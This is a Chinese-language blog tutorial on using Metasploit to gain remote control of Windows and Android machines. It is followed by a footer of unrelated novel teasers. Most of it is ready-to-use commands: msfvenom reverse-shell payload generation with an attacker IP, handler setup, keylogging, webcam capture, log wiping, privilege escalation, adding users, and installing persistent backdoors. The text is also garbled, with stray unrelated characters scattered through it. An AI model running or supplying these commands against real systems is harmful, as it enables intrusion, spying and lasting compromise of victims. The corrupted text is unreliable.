1.1Matesploit的msfconsole模式的簡單使用

目的:使用matesploit模塊獲得win7權(quán)限

系統(tǒng):Kali,攻擊機:Kali掷倔,被攻擊電腦:Win7/Win10
1,生成遠控文件
Win系列:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f exe -o /root/Desktop/virus.exe -e x86/shikata_ga_nai -i 8
lhost:攻擊者ip
lport:攻擊者port

Android:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 R > /root/a.apk

2,Kali執(zhí)行msfconsole開始監(jiān)聽程序(Root模式下)

msfconsole
image.png

使用handler模塊

use exploit/multi/handler
image.png

設(shè)置攻擊負載

set payload windows/meterpreter/reverse_tcp
image.png

設(shè)置本地監(jiān)聽ip和端口

set LHOST 127.0.0.1

set LPORT 4444
image.png

最后上渴,將生成的.exe/.apk文件在windows/android上運行
在Kali上運行 run/exploit


image.png

成功得到權(quán)限



輸入shell冯袍,進入windows cmd模式
image.png

其他常用命令:
uictl開關(guān)鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all]  #開啟或禁止鍵盤/鼠標
uictl disable mouse  #禁用鼠標
uictl disable keyboard  #禁用鍵盤

網(wǎng)絡(luò)攝像頭攝像頭命令
webcam_list  #查看攝像頭
webcam_snap   #通過攝像頭拍照
webcam_stream   #通過攝像頭開啟視頻

執(zhí)行執(zhí)行文件
execute #在目標機中執(zhí)行文件
execute -H -i -f cmd.exe # 創(chuàng)建新進程cmd.exe,-H不可見苍鲜,-i交互

遷移進程遷移
getpid    # 獲取當(dāng)前進程的pid
ps   # 查看當(dāng)前活躍進程
migrate <pid值>    #將Meterpreter會話移植到指定pid值進程中
kill <pid值>   #殺死進程

清除日志
clearav  #清除windows中的應(yīng)用程序日志思灰、系統(tǒng)日志、安全日志

getsystem提權(quán)
getsystem

遠程桌面及截屏
enumdesktops  #查看可用的桌面
getdesktop    #獲取當(dāng)前meterpreter 關(guān)聯(lián)的桌面
set_desktop   #設(shè)置meterpreter關(guān)聯(lián)的桌面  -h查看幫助
screenshot  #截屏
use espia  #或者使用espia模塊截屏  然后輸入screengrab
run vnc  #使用vnc遠程桌面連接

getgui命令
run getgui –h #查看幫助
run getgui -e #開啟遠程桌面
run getgui -u lltest2 -p 123456   #添加用戶
run getgui -f 6661 –e   #3389端口轉(zhuǎn)發(fā)到6661

鍵盤記錄
keyscan_start  #開始鍵盤記錄
keyscan_dump   #導(dǎo)出記錄數(shù)據(jù)
keyscan_stop #結(jié)束鍵盤記錄

后門植入

Metasploit的自帶的后門有兩種方式啟動的混滔,一種是通過啟動項啟動(持久性)洒疚,一種是通過服務(wù)啟動(metsvc),另外還可以通過persistence_exe自定義后門文件坯屿。

1)持久性啟動項后門

在C:\用戶*** \應(yīng)用程序數(shù)據(jù)\本地的\ Temp \目錄下油湖,上傳一個VBS腳本
在注冊表A. HKLM \軟件\微軟\的Windows \ CurrentVersion \運行\(zhòng)加入開機啟動項

run persistence –h  #查看幫助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
#-X指定啟動的方式為開機自啟動,-i反向連接的時間間隔(5s) –r 指定攻擊者的ip


image

連接后門

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit

2)metsvc服務(wù)后門

在C:\用戶*** \應(yīng)用程序數(shù)據(jù)\本地\ TEMP \上傳了三個文件(metsrv.x86.dll领跛,metsvc-SERVER.EXE乏德,metsvc.exe),通過服務(wù)啟動吠昭,服務(wù)名為Meterpreter就會

run metsvc –h   # 查看幫助
run metsvc –A   #自動安裝后門


image

連接后門

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit

然后喊括,開始你的冒險之旅吧!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末矢棚,一起剝皮案震驚了整個濱河市郑什,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌蒲肋,老刑警劉巖蘑拯,帶你破解...
    沈念sama閱讀 222,104評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件钝满,死亡現(xiàn)場離奇詭異,居然都是意外死亡申窘,警方通過查閱死者的電腦和手機弯蚜,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,816評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來偶洋,“玉大人,你說我怎么就攤上這事距糖⌒眩” “怎么了?”我有些...
    開封第一講書人閱讀 168,697評論 0 360
  • 文/不壞的土叔 我叫張陵悍引,是天一觀的道長恩脂。 經(jīng)常有香客問我,道長趣斤,這世上最難降的妖魔是什么俩块? 我笑而不...
    開封第一講書人閱讀 59,836評論 1 298
  • 正文 為了忘掉前任,我火速辦了婚禮浓领,結(jié)果婚禮上玉凯,老公的妹妹穿的比我還像新娘。我一直安慰自己联贩,他們只是感情好漫仆,可當(dāng)我...
    茶點故事閱讀 68,851評論 6 397
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著泪幌,像睡著了一般盲厌。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上祸泪,一...
    開封第一講書人閱讀 52,441評論 1 310
  • 那天吗浩,我揣著相機與錄音,去河邊找鬼没隘。 笑死懂扼,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的右蒲。 我是一名探鬼主播微王,決...
    沈念sama閱讀 40,992評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼品嚣!你這毒婦竟也來了炕倘?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,899評論 0 276
  • 序言:老撾萬榮一對情侶失蹤翰撑,失蹤者是張志新(化名)和其女友劉穎罩旋,沒想到半個月后啊央,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,457評論 1 318
  • 正文 獨居荒郊野嶺守林人離奇死亡涨醋,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,529評論 3 341
  • 正文 我和宋清朗相戀三年瓜饥,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片浴骂。...
    茶點故事閱讀 40,664評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡乓土,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出溯警,到底是詐尸還是另有隱情趣苏,我是刑警寧澤,帶...
    沈念sama閱讀 36,346評論 5 350
  • 正文 年R本政府宣布梯轻,位于F島的核電站食磕,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏喳挑。R本人自食惡果不足惜彬伦,卻給世界環(huán)境...
    茶點故事閱讀 42,025評論 3 334
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望伊诵。 院中可真熱鬧单绑,春花似錦、人聲如沸曹宴。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,511評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽浙炼。三九已至份氧,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間弯屈,已是汗流浹背蜗帜。 一陣腳步聲響...
    開封第一講書人閱讀 33,611評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留资厉,地道東北人厅缺。 一個月前我還...
    沈念sama閱讀 49,081評論 3 377
  • 正文 我出身青樓,卻偏偏與公主長得像宴偿,于是被迫代替她去往敵國和親湘捎。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,675評論 2 359

推薦閱讀更多精彩內(nèi)容